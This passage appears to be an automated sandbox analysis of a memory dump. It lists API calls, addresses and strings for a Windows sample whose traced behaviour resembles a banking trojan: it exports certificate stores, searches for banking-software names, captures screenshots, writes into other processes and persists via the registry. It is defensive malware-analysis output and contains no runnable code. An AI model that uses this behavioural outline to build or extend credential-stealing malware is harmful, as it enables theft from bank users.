VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00CD05C1
memset.MSVCRT ref: 00CD062C

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD09C2, Relevance: 11.1, APIs: 5, Instructions: 210

APIs

GetCurrentThreadId.KERNEL32 ref: 00CD09D3

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

Part of subcall function 00CD043B: memset.MSVCRT ref: 00CD04EB
Part of subcall function 00CD043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00CD04FC
Part of subcall function 00CD043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00CD0530
Part of subcall function 00CD043B: memset.MSVCRT ref: 00CD0570
Part of subcall function 00CD043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00CD0581
Part of subcall function 00CD043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00CD05C1
Part of subcall function 00CD043B: memset.MSVCRT ref: 00CD062C

Part of subcall function 00CC9BA9: SetLastError.KERNEL32(0000000D), ref: 00CC9BE4

memcpy.MSVCRT ref: 00CD0B42
memset.MSVCRT ref: 00CD0BA8
VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00CD0BBD
GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 00CD0BC7

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CD0643: memset.MSVCRT ref: 00CD0654

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD24AA, Relevance: 10.8, APIs: 6, Instructions: 91

APIs

CertOpenSystemStoreW.CRYPT32(00000000), ref: 00CD24BC
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00CD24DA
CertEnumCertificatesInStore.CRYPT32(?,?,?,00000000), ref: 00CD24E7
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000), ref: 00CD251B

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000,00000004,?,?,?,00000000), ref: 00CD254D

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CD258C: GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 00CD25BA
Part of subcall function 00CD258C: GetSystemTime.KERNEL32(?), ref: 00CD260D
Part of subcall function 00CD258C: CharLowerW.USER32(?), ref: 00CD265D
Part of subcall function 00CD258C: PathRenameExtensionW.SHLWAPI(?,?), ref: 00CD268D

CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 00CD257C

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE582C, Relevance: 9.2, APIs: 3, Strings: 1, Instructions: 38

APIs

EnterCriticalSection.KERNEL32(00D03510,?,?,?,00CDE9BA), ref: 00CE5842
LeaveCriticalSection.KERNEL32(00D03510,?,?,?,00CDE9BA), ref: 00CE5868

Part of subcall function 00CE575A: memset.MSVCRT ref: 00CE5774
Part of subcall function 00CE575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CE57BA

CreateMutexW.KERNEL32(00D02974,00000000,Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}), ref: 00CE587A

Part of subcall function 00CD2F31: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CD2F37
Part of subcall function 00CD2F31: CloseHandle.KERNEL32 ref: 00CD2F49

Strings

Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}, xrefs: 00CE586F

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD1905, Relevance: 7.2, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(00F51E90,00000000,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD1913

Part of subcall function 00CD3764: GetModuleHandleW.KERNEL32(?), ref: 00CD3780
Part of subcall function 00CD3764: GetModuleHandleW.KERNEL32(?), ref: 00CD37BB

GetFileVersionInfoSizeW.VERSION(00F51EF0,?,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD1933
GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD1953

Part of subcall function 00CF4D77: GetCommandLineW.KERNEL32 ref: 00CF4E01
Part of subcall function 00CF4D77: CommandLineToArgvW.SHELL32 ref: 00CF4E08
Part of subcall function 00CF4D77: LocalFree.KERNEL32 ref: 00CF4E48
Part of subcall function 00CF4D77: GetModuleHandleW.KERNEL32(?), ref: 00CF4E8A

Part of subcall function 00CCBBAD: VerQueryValueW.VERSION(?,00CC75E4,?,?,00F51E90,?,00CD1983,?,?,?,?,?,?,00CE48EB), ref: 00CCBBCE
Part of subcall function 00CCBBAD: GetModuleHandleW.KERNEL32(?), ref: 00CCBC0F

Part of subcall function 00CDD8C0: GetModuleHandleW.KERNEL32(?), ref: 00CDD8DD

Part of subcall function 00CCE2C1: EnterCriticalSection.KERNEL32(00D03510,00F51E90,00CD198D,?,?,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CCE2D1
Part of subcall function 00CCE2C1: LeaveCriticalSection.KERNEL32(00D03510,?,?,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CCE2F9

Part of subcall function 00CCD987: InitializeCriticalSection.KERNEL32 ref: 00CCD9B5
Part of subcall function 00CCD987: GetModuleHandleW.KERNEL32(?), ref: 00CCDA1C

Part of subcall function 00CCE209: InitializeCriticalSection.KERNEL32 ref: 00CCE21E

Part of subcall function 00CD599B: EnterCriticalSection.KERNEL32(00D027DC,00000000,00CCD9CE,00F51E90,?,?,?,00CD1992,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD59A7
Part of subcall function 00CD599B: LeaveCriticalSection.KERNEL32(00D027DC,?,?,?,00CD1992,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD59B7

Part of subcall function 00CD59C5: LeaveCriticalSection.KERNEL32(00D027DC,00CD5A45,00000002,?,?,?,00CCDAA2,00000002,00000001,000000FF), ref: 00CD59CF

Part of subcall function 00CD59D6: LeaveCriticalSection.KERNEL32(00D027DC,?,00CCD9F7,00000009,00F51E90,?,?,?,00CD1992,?,?,?,?,00CE48EB), ref: 00CD59E3

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

LeaveCriticalSection.KERNEL32(00F51E90,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD19D2

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD506A, Relevance: 7.2, APIs: 4, Instructions: 38

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00CD507A
Thread32First.KERNEL32(?,?), ref: 00CD5095
Thread32Next.KERNEL32(?,?), ref: 00CD50A8
CloseHandle.KERNEL32 ref: 00CD50B3

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDEA5E, Relevance: 7.2, APIs: 4, Instructions: 28

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001E9A0,00000000), ref: 00CDEA75
WaitForSingleObject.KERNEL32(?,00003A98), ref: 00CDEA87
TerminateThread.KERNEL32(?,00000000), ref: 00CDEA93
CloseHandle.KERNEL32 ref: 00CDEA9A

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD03FD, Relevance: 5.6, APIs: 3, Instructions: 28

APIs

GetCurrentProcess.KERNEL32 ref: 00CD0400
VirtualProtect.KERNEL32(3D920000,00010000,00000020,?), ref: 00CD0421
FlushInstructionCache.KERNEL32(?,3D920000,00010000), ref: 00CD042A

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD06B9, Relevance: 5.5, APIs: 3, Instructions: 37

APIs

GetCurrentThreadId.KERNEL32 ref: 00CD06CE
InterlockedCompareExchange.KERNEL32(00D0276C), ref: 00CD06DA
VirtualProtect.KERNEL32(3D920000,00010000,00000040,?), ref: 00CD071E

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE0DB0, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 29

APIs

Part of subcall function 00CE0D74: RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 00CE0D9C

RegSetValueExW.ADVAPI32(00000000,000000FE,?,00000000,?,?), ref: 00CE0DE5

Part of subcall function 00CE0D19: RegFlushKey.ADVAPI32 ref: 00CE0D29
Part of subcall function 00CE0D19: RegCloseKey.ADVAPI32 ref: 00CE0D31

Strings

Software\Microsoft\Yfosteyq, xrefs: 00CE0DC5

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDD904, Relevance: 3.1, APIs: 2, Instructions: 79

APIs

Part of subcall function 00CD5A4F: GetLastError.KERNEL32(?,?,00CCB9B4), ref: 00CD5A51
Part of subcall function 00CD5A4F: TlsGetValue.KERNEL32(?,?,00CCB9B4), ref: 00CD5A6E
Part of subcall function 00CD5A4F: TlsSetValue.KERNEL32(00000001), ref: 00CD5A80
Part of subcall function 00CD5A4F: SetLastError.KERNEL32(?,?,00CCB9B4), ref: 00CD5A90

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018), ref: 00CDD93C

Part of subcall function 00CEBE5A: CreateMutexW.KERNEL32(00D02974,00000001,?), ref: 00CEBEA0
Part of subcall function 00CEBE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00CEBEAC
Part of subcall function 00CEBE5A: CloseHandle.KERNEL32 ref: 00CEBEBA

Part of subcall function 00CCFBD5: TlsGetValue.KERNEL32(?,?,00CDD975), ref: 00CCFBDE

Part of subcall function 00CE4A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00CE4A89
Part of subcall function 00CE4A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00CE4AC4
Part of subcall function 00CE4A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00CE4B04
Part of subcall function 00CE4A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00CE4B27
Part of subcall function 00CE4A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00CE4B77

CloseHandle.KERNEL32 ref: 00CDD9B1

Part of subcall function 00CD506A: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00CD507A
Part of subcall function 00CD506A: Thread32First.KERNEL32(?,?), ref: 00CD5095
Part of subcall function 00CD506A: Thread32Next.KERNEL32(?,?), ref: 00CD50A8
Part of subcall function 00CD506A: CloseHandle.KERNEL32 ref: 00CD50B3

Part of subcall function 00CD5AD5: GetLastError.KERNEL32(?,00CCBA1E), ref: 00CD5AD6
Part of subcall function 00CD5AD5: TlsSetValue.KERNEL32(00000000), ref: 00CD5AE6
Part of subcall function 00CD5AD5: SetLastError.KERNEL32(?,?,00CCBA1E), ref: 00CD5AED

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEBEE3, Relevance: 2.8, APIs: 1, Instructions: 24

APIs

CreateMutexW.KERNEL32(00D02974,00000000,?), ref: 00CEBF05

Part of subcall function 00CD2F31: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CD2F37
Part of subcall function 00CD2F31: CloseHandle.KERNEL32 ref: 00CD2F49

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD0FC3, Relevance: 2.2, APIs: 1, Instructions: 68

APIs

LoadLibraryA.KERNEL32 ref: 00CD1013

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE0E64, Relevance: 2.2, APIs: 1, Instructions: 68

APIs

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

Part of subcall function 00CE0DFC: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00CE0E10

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CE0EBF

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE0D74, Relevance: 2.1, APIs: 1, Instructions: 28

APIs

RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 00CE0D9C

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD696E, Relevance: 1.9, APIs: 1, Instructions: 9

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000), ref: 00CD6977

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE0DFC, Relevance: 1.9, APIs: 1, Instructions: 8

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00CE0E10

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Non-executed Functions

Function 00CCDBE8, Relevance: 66.8, APIs: 19, Strings: 19, Instructions: 103

APIs

StrStrIW.SHLWAPI(tellerplus), ref: 00CCDBFA
StrStrIW.SHLWAPI(bancline), ref: 00CCDC0F
StrStrIW.SHLWAPI(fidelity), ref: 00CCDC24
StrStrIW.SHLWAPI(micrsolv), ref: 00CCDC39
StrStrIW.SHLWAPI(bankman), ref: 00CCDC4E
StrStrIW.SHLWAPI(vantiv), ref: 00CCDC63
StrStrIW.SHLWAPI(episys), ref: 00CCDC78
StrStrIW.SHLWAPI(jack henry), ref: 00CCDC8D
StrStrIW.SHLWAPI(cruisenet), ref: 00CCDCA2
StrStrIW.SHLWAPI(gplusmain), ref: 00CCDCB7
StrStrIW.SHLWAPI(launchpadshell.exe), ref: 00CCDCCC
StrStrIW.SHLWAPI(dirclt32.exe), ref: 00CCDCE1
StrStrIW.SHLWAPI(wtng.exe), ref: 00CCDCF2
StrStrIW.SHLWAPI(prologue.exe), ref: 00CCDD03
StrStrIW.SHLWAPI(silverlake), ref: 00CCDD14
StrStrIW.SHLWAPI(pcsws.exe), ref: 00CCDD25
StrStrIW.SHLWAPI(v48d0250s1), ref: 00CCDD36
StrStrIW.SHLWAPI(fdmaster.exe), ref: 00CCDD47
StrStrIW.SHLWAPI(fastdoc), ref: 00CCDD58

Strings

tellerplus, xrefs: 00CCDBEF
bancline, xrefs: 00CCDC04
fidelity, xrefs: 00CCDC19
micrsolv, xrefs: 00CCDC2E
bankman, xrefs: 00CCDC43
vantiv, xrefs: 00CCDC58
episys, xrefs: 00CCDC6D
jack henry, xrefs: 00CCDC82
cruisenet, xrefs: 00CCDC97
gplusmain, xrefs: 00CCDCAC
launchpadshell.exe, xrefs: 00CCDCC1
dirclt32.exe, xrefs: 00CCDCD6
wtng.exe, xrefs: 00CCDCE7
prologue.exe, xrefs: 00CCDCF8
silverlake, xrefs: 00CCDD09
pcsws.exe, xrefs: 00CCDD1A
v48d0250s1, xrefs: 00CCDD2B
fdmaster.exe, xrefs: 00CCDD3C
fastdoc, xrefs: 00CCDD4D

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD4085, Relevance: 48.4, APIs: 20, Strings: 4, Instructions: 151

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00CD4097
GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 00CD40AF
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CD40EE
CreateCompatibleDC.GDI32 ref: 00CD40FF
LoadCursorW.USER32(00000000,00007F00), ref: 00CD4115
GetIconInfo.USER32(?,?), ref: 00CD4129
GetCursorPos.USER32(?), ref: 00CD4138
GetDeviceCaps.GDI32(?,00000008), ref: 00CD414F
GetDeviceCaps.GDI32(?,0000000A), ref: 00CD4158
CreateCompatibleBitmap.GDI32(?,?), ref: 00CD4164
SelectObject.GDI32 ref: 00CD4172
BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 00CD4193
DrawIcon.USER32(?,?,?,?), ref: 00CD41C5

Part of subcall function 00CD332C: GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00CD3341
Part of subcall function 00CD332C: GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 00CD334C

SelectObject.GDI32(?,00000008), ref: 00CD41E1
DeleteObject.GDI32 ref: 00CD41E8
DeleteDC.GDI32 ref: 00CD41EF
DeleteDC.GDI32 ref: 00CD41F6
FreeLibrary.KERNEL32(?), ref: 00CD4206
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00CD421C
FreeLibrary.KERNEL32(?), ref: 00CD4230

Strings

gdiplus.dll, xrefs: 00CD408C
GdiplusStartup, xrefs: 00CD40A9
DISPLAY, xrefs: 00CD40E9
GdiplusShutdown, xrefs: 00CD4216

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD6A69, Relevance: 37.7, APIs: 1, Instructions: 7

APIs

HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE5087, Relevance: 34.4, APIs: 16, Strings: 1, Instructions: 241

APIs

Part of subcall function 00CD1B16: CreateFileW.KERNEL32(00F51EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CD1B2F
Part of subcall function 00CD1B16: GetFileSizeEx.KERNEL32(?,?), ref: 00CD1B42
Part of subcall function 00CD1B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00CD1B68
Part of subcall function 00CD1B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00CD1B80
Part of subcall function 00CD1B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CD1B9E
Part of subcall function 00CD1B16: CloseHandle.KERNEL32 ref: 00CD1BA7

CreateMutexW.KERNEL32(00D02974,00000001,?), ref: 00CE512D
GetLastError.KERNEL32(?,?,00000001,?,?,?,00CE5452), ref: 00CE513D
CloseHandle.KERNEL32 ref: 00CE514B
CloseHandle.KERNEL32 ref: 00CE5229

Part of subcall function 00CE4BA2: memcpy.MSVCRT ref: 00CE4BB2

lstrlenW.KERNEL32(?), ref: 00CE51AD

Part of subcall function 00CF4181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CF41A1
Part of subcall function 00CF4181: Process32FirstW.KERNEL32(?,?), ref: 00CF41C6
Part of subcall function 00CF4181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 00CF421D
Part of subcall function 00CF4181: CloseHandle.KERNEL32 ref: 00CF423B
Part of subcall function 00CF4181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00CF4257
Part of subcall function 00CF4181: memcmp.MSVCRT ref: 00CF426F
Part of subcall function 00CF4181: CloseHandle.KERNEL32(?), ref: 00CF42E7
Part of subcall function 00CF4181: Process32NextW.KERNEL32(?,?), ref: 00CF42F3
Part of subcall function 00CF4181: CloseHandle.KERNEL32 ref: 00CF4306

ExitWindowsEx.USER32(00000014,80000000), ref: 00CE51DD
OpenEventW.KERNEL32(00000002,00000000,?), ref: 00CE5203
SetEvent.KERNEL32 ref: 00CE5210
CloseHandle.KERNEL32 ref: 00CE5217
IsWellKnownSid.ADVAPI32(00F51EC0,00000016), ref: 00CE5279
CreateEventW.KERNEL32(00D02974,00000001,00000000,?), ref: 00CE5348
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CE5361
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00CE5373
CloseHandle.KERNEL32(00000000), ref: 00CE538A
CloseHandle.KERNEL32(?), ref: 00CE5390
CloseHandle.KERNEL32(?), ref: 00CE5396

Part of subcall function 00CD2FB7: ReleaseMutex.KERNEL32 ref: 00CD2FBB
Part of subcall function 00CD2FB7: CloseHandle.KERNEL32 ref: 00CD2FC2

Part of subcall function 00CDE8A2: VirtualProtect.KERNEL32(00CD9777,?,00000040,?), ref: 00CDE8BA
Part of subcall function 00CDE8A2: VirtualProtect.KERNEL32(00CD9777,?,?,?), ref: 00CDE92D

Part of subcall function 00CEBAD3: memcpy.MSVCRT ref: 00CEBAEE
Part of subcall function 00CEBAD3: StringFromGUID2.OLE32(?), ref: 00CEBB92

Part of subcall function 00CD99FA: LoadLibraryW.KERNEL32(?), ref: 00CD9A1C
Part of subcall function 00CD99FA: GetProcAddress.KERNEL32(?,?), ref: 00CD9A40
Part of subcall function 00CD99FA: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00CD9A78
Part of subcall function 00CD99FA: lstrlenW.KERNEL32(?), ref: 00CD9A90
Part of subcall function 00CD99FA: StrCmpNIW.SHLWAPI(?,?), ref: 00CD9AA4
Part of subcall function 00CD99FA: lstrlenW.KERNEL32(?), ref: 00CD9ABA
Part of subcall function 00CD99FA: memcpy.MSVCRT ref: 00CD9AC6
Part of subcall function 00CD99FA: FreeLibrary.KERNEL32 ref: 00CD9ADC
Part of subcall function 00CD99FA: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00CD9B1B
Part of subcall function 00CD99FA: NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 00CD9B57
Part of subcall function 00CD99FA: NetApiBufferFree.NETAPI32(?), ref: 00CD9C02
Part of subcall function 00CD99FA: NetApiBufferFree.NETAPI32(00000000), ref: 00CD9C14
Part of subcall function 00CD99FA: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00CD9C33

Part of subcall function 00CD5433: CharToOemW.USER32(00F51EF0,?), ref: 00CD5444

Part of subcall function 00CEB0C1: GetCommandLineW.KERNEL32 ref: 00CEB0DB
Part of subcall function 00CEB0C1: CommandLineToArgvW.SHELL32 ref: 00CEB0E2
Part of subcall function 00CEB0C1: StrCmpNW.SHLWAPI(?,00CC7F1C,00000002), ref: 00CEB108
Part of subcall function 00CEB0C1: LocalFree.KERNEL32 ref: 00CEB134
Part of subcall function 00CEB0C1: MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 00CEB171
Part of subcall function 00CEB0C1: memcpy.MSVCRT ref: 00CEB184
Part of subcall function 00CEB0C1: UnmapViewOfFile.KERNEL32 ref: 00CEB1BD
Part of subcall function 00CEB0C1: memcpy.MSVCRT ref: 00CEB1E0
Part of subcall function 00CEB0C1: CloseHandle.KERNEL32 ref: 00CEB1F9

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CEBEE3: CreateMutexW.KERNEL32(00D02974,00000000,?), ref: 00CEBF05

Part of subcall function 00CD9925: memcpy.MSVCRT ref: 00CD993C
Part of subcall function 00CD9925: memcmp.MSVCRT ref: 00CD995E
Part of subcall function 00CD9925: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CD998C
Part of subcall function 00CD9925: lstrcmpiW.KERNEL32(?), ref: 00CD99DC

Part of subcall function 00CD1BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CD1BC6
Part of subcall function 00CD1BB5: CloseHandle.KERNEL32 ref: 00CD1BD5

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00CE5304

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD99FA, Relevance: 28.4, APIs: 13, Strings: 1, Instructions: 205

APIs

LoadLibraryW.KERNEL32(?), ref: 00CD9A1C
GetProcAddress.KERNEL32(?,?), ref: 00CD9A40
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00CD9A78
lstrlenW.KERNEL32(?), ref: 00CD9A90
StrCmpNIW.SHLWAPI(?,?), ref: 00CD9AA4
lstrlenW.KERNEL32(?), ref: 00CD9ABA
memcpy.MSVCRT ref: 00CD9AC6
FreeLibrary.KERNEL32 ref: 00CD9ADC
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00CD9B1B
NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 00CD9B57

Part of subcall function 00CE4ED1: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00CE4EE5
Part of subcall function 00CE4ED1: PathUnquoteSpacesW.SHLWAPI(?), ref: 00CE4F4A
Part of subcall function 00CE4ED1: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00CE4F59
Part of subcall function 00CE4ED1: LocalFree.KERNEL32(00000001), ref: 00CE4F6D

NetApiBufferFree.NETAPI32(?), ref: 00CD9C02

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

Part of subcall function 00CE4461: PathSkipRootW.SHLWAPI(?), ref: 00CE448B
Part of subcall function 00CE4461: GetFileAttributesW.KERNEL32(?), ref: 00CE44B8
Part of subcall function 00CE4461: CreateDirectoryW.KERNEL32(?,00000000), ref: 00CE44CC
Part of subcall function 00CE4461: SetLastError.KERNEL32(00000050), ref: 00CE44EF

Part of subcall function 00CD9633: LoadLibraryW.KERNEL32(?), ref: 00CD9657
Part of subcall function 00CD9633: GetProcAddress.KERNEL32(?,?), ref: 00CD9685
Part of subcall function 00CD9633: GetProcAddress.KERNEL32(?,?), ref: 00CD969F
Part of subcall function 00CD9633: GetProcAddress.KERNEL32(?,?), ref: 00CD96BB
Part of subcall function 00CD9633: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00CD96E8
Part of subcall function 00CD9633: FreeLibrary.KERNEL32 ref: 00CD9769

NetApiBufferFree.NETAPI32(00000000), ref: 00CD9C14
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00CD9C33

Part of subcall function 00CEB70A: CreateDirectoryW.KERNEL32(?,00000000), ref: 00CEB783
Part of subcall function 00CEB70A: SetFileAttributesW.KERNEL32(?), ref: 00CEB7A2
Part of subcall function 00CEB70A: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 00CEB7B9
Part of subcall function 00CEB70A: GetLastError.KERNEL32(?,00000002,?,?), ref: 00CEB7C6
Part of subcall function 00CEB70A: CloseHandle.KERNEL32 ref: 00CEB7FF

Part of subcall function 00CD7058: GetFileSizeEx.KERNEL32(00000000,?), ref: 00CD708F
Part of subcall function 00CD7058: SetEndOfFile.KERNEL32 ref: 00CD7105
Part of subcall function 00CD7058: FlushFileBuffers.KERNEL32(?), ref: 00CD7110

Strings

.exe, xrefs: 00CD9BBC 00CD9C4D

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDD2B1, Relevance: 27.2, APIs: 18, Instructions: 214

APIs

GetProcAddress.KERNEL32(?,?), ref: 00CDD2D5
GetProcAddress.KERNEL32(?,?), ref: 00CDD2F5
GetProcAddress.KERNEL32(?,?), ref: 00CDD30E
GetProcAddress.KERNEL32(?,?), ref: 00CDD327
GetProcAddress.KERNEL32(?,?), ref: 00CDD340
GetProcAddress.KERNEL32(?,?), ref: 00CDD359
GetProcAddress.KERNEL32(?,?), ref: 00CDD376
GetProcAddress.KERNEL32(?,?), ref: 00CDD393
GetProcAddress.KERNEL32(?,?), ref: 00CDD3B0
GetProcAddress.KERNEL32(?,?), ref: 00CDD3CD
GetProcAddress.KERNEL32(?,?), ref: 00CDD3EA
GetProcAddress.KERNEL32(?,?), ref: 00CDD407
GetProcAddress.KERNEL32(?,?), ref: 00CDD424
GetProcAddress.KERNEL32(?,?), ref: 00CDD441
GetProcAddress.KERNEL32(?,?), ref: 00CDD45E
GetProcAddress.KERNEL32(?,?), ref: 00CDD47B
GetProcAddress.KERNEL32(?,?), ref: 00CDD498
